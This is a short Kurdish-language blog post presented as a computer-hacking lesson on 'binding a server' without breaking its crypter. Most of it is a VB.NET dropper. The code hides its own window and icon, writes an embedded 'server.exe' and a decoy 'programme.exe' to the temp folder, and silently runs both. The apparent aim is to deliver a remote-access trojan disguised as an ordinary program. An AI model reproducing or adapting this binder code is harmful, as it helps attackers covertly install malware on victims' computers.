دمج كردنی سێرڤه‌ر به‌بێ تێكدانی ته‌شفیری سێرڤه‌ر (هاكی كۆمپیوته‌ر) - Home4T ماڵیک بۆ تەکنۆلۆژیا

Header Ads

Live Tv

دمج كردنی سێرڤه‌ر به‌بێ تێكدانی ته‌شفیری سێرڤه‌ر (هاكی كۆمپیوته‌ر)

سڵاو هاوڕێیان
له‌م وانه‌یه‌دا باس له‌ ده‌مج كردنی سێرڤه‌ر ئه‌كه‌ین

كۆدی ڤیژوال به‌یسك
Me.Hide()
Me.ShowInTaskbar = False
Me.ShowIcon = False
Opacity = 0
Dim red As String = IO.Path.GetTempPath + "server.exe"
IO.File.WriteAllBytes(red, My.Resources.server)
Process.Start(red)
Dim devil As String = IO.Path.GetTempPath + "programme.exe"
IO.File.WriteAllBytes(devil, My.Resources.programme)
Process.Start(devil)
End
به‌وهیوایه‌ی سودێكی هه‌بێ
سەبسکرایبی ئەم چەناڵە بکەن